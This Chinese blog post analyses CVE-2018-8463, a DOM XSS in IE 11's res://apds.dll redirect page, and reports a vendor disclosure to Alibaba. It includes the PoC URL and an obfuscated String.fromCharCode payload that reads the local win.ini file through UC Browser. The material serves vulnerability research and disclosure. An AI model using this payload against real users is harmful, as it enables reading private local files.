CVE-2018-8463漏洞分析与利用

CVE-2018-8463漏洞是一个基于IE 11浏览器内置dll资源中包含htm的一个dom 类型xss。

根据exploitdb上的细节,我们发现,poc为:
res://apds.dll/redirect.html?target=javascript:alert(1)//edgehtml.dll/flags.htm

针对dll资源文件检索,我们可以利用ResourcesExtract工具进行搜索
筛选出我们存在xss漏洞的html:

可以看到,此处定义了一个targetParamRegex参数获取window.location.search传递过来的值,带入到了window.location.replace中处理,形成了一个dom类型的xss。

因为存在xss的域在res://,如果对浏览器安全有一定经验的同学一定不会陌生,res://域属于特权域,
但由于IE 11本身的安全策略,导致无法利用该漏洞读取本地文件。但是笔者针对国内流行的pc浏览器测试,还是发现了一些问题,利用这些问题可以顺利的读取系统本地文件。

ie默认情况下,http域并不能向res域跳转:

但是UC windows 版浏览器却默认允许这种跳转。

服务器构造一个读取本地文件POC代码:

<meta http-equiv=”X-UA-Compatible” content=”IE=11″>
<script>

location.href=”res://apds.dll/redirect.html?target=javascript:eval(String.fromCharCode(120,109,108,104,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,46,51,46,48,34,41,59,10,120,109,108,104,116,116,112,46,111,112,101,110,40,34,71,69,84,34,44,34,102,105,108,101,58,47,47,47,47,49,50,55,46,48,46,48,46,49,47,99,36,47,119,105,110,100,111,119,115,47,119,105,110,46,105,110,105,34,44,102,97,108,115,101,41,59,10,120,109,108,104,116,116,112,46,115,101,110,100,40,41,59,10,97,108,101,114,116,40,120,109,108,104,116,116,112,46,114,101,115,112,111,110,115,101,84,101,120,116,41))”;

</script>

meta用于设置默认渲染为IE11,目的是引用该漏洞触发环境,最终结果如下图:


一定情况下,是可以造成命令执行的:


2018-10-08 19:42:48 提交给阿里巴巴应急响应中心

2018-10-11 16:15:52 [ 被驳回 ] : 非常感谢您的报告,漏洞已忽略,UC浏览器桌面版现已不再维护,除影响范围很大的严重漏洞外,不再接收新漏洞。感谢您对我们的关注和支持。

CVE-2018-8463漏洞分析与利用》有8个想法

回复 有问题 取消回复

您的电子邮箱地址不会被公开。 必填项已用*标注